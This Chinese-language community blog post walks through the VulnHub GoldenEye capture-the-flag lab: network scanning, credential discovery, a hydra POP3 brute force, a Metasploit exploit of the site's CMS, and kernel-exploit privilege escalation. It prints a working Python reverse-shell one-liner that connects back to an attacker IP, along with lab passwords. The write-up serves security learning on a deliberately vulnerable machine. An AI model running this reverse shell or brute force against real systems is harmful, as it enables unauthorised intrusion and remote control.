vulnhub-GoldenEye靶机通关wp

举报
亿人安全 发表于 2023/05/26 15:25:12 2023/05/26
【摘要】 大家好,我们是想要为亿人提供安全的亿人安全,这是我们自己想要做的事情,也是做这个公众号的初衷。希望以干货的方式,让大家多多了解这个行业,从中学到对自己有用的芝士~靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/靶机难度:中等(CTF)目标:得到root权限&找到flag.txt一、信息收集1.arp-scan-l 收集目标ip2.使用命令...

大家好,我们是想要为亿人提供安全的亿人安全,这是我们自己想要做的事情,也是做这个公众号的初衷。希望以干货的方式,让大家多多了解这个行业,从中学到对自己有用的芝士~


靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/

靶机难度:中等(CTF)


目标:得到root权限&找到flag.txt

一、信息收集

1.arp-scan-l 收集目标ip

图片

2.使用命令:nmap -sP 192.168.182.0/24

图片

3.使用命令:nmap -sS -sV -T5 -A -p- 192.168.182.141


图片

4.到/sev-home/目录中。

图片


5.检查主页的html内容以获取任何有用的提示(F12查看)

图片

6.发现了一个用户名和密码,然后发现了一个编码加密

图片


图片

7,使用burp解密模块解密。

图片

8.然后登录


图片

9.然后使用f12查看,发现了pop3服务。POP3服务器的端口:55006、55007。

图片

10.浏览器上访问发现是55007端口。


图片

11.开始生成字典,开始爆破密码。

图片

12.开始使用nc连接,用户:boris 密码:secret1! 用户:natalya 密码:bird

然后开始读邮件

图片

13.使用,用户:natalya 密码:bird,开始读邮件。

图片

图片

14.找到了敏感信息泄露

图片

15.进入/etc/hosts目录,加入severnaya-station.com

用户名:xenia

密码:RCP90rulez!

域:severnaya-station.com

网址:severnaya-station.com/gnocertdir

我们现根据邮件提示添加本地域名:severnaya-station.com

图片

16.本地访问。

图片

17.登录之后,发现一个doak用户

图片

18.加入字典

图片

19.开始爆破用户。

hydra -L x.txt -P /usr/share/wordlists/fasttrack.txt 10.10.10.149 -s 55007 pop3

图片

19.使用nc连接。

图片

20.发现了版本2.2.3的cms。

图片


21.发现了一个敏感文件。

图片

22.发现了目录

图片

23访问一下看看。使用wget下载到本地,wget http://severnaya-station.com/dir007key/for-007.jpg

图片

24.使用binwalk(路由逆向分析工具)、exiftool(图虫)、strings(识别动态库版本指令)等查看图片。

图片

25.发现base64加密。

图片

26.解密。xWinter1995x!

图片

27.使用admin/xWinter1995x! 登录。

图片

28.浏览器搜索历史漏洞。

图片

二 渗透

1.使用msf,查找历史漏洞。

图片

2.设置payload。

图片

3.更改编译环境。

图片

4.使用python脚本提权。

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.10.128”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

图片


图片

5.kali使用nc监听6666端口

图片

三、提权

1.下载提权脚本。

图片

2.进入文件目录。

图片

3.开启远程文件传输


图片图片

4.然后在目标机器传输脚本

图片

5.将gcc编译改为cc编译。

图片

6.使用chmod+x权限

使用./exp提权


图片

7.提权成功,然后访问root目录,查看flag。


总结

希望这篇文章可以帮助到你,我也是初学者,希望会的大佬勿喷,如果有错误的地方请指出来,我一定虚心改正。如果有好的方法,大家可以分享出来,多多交流。

【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。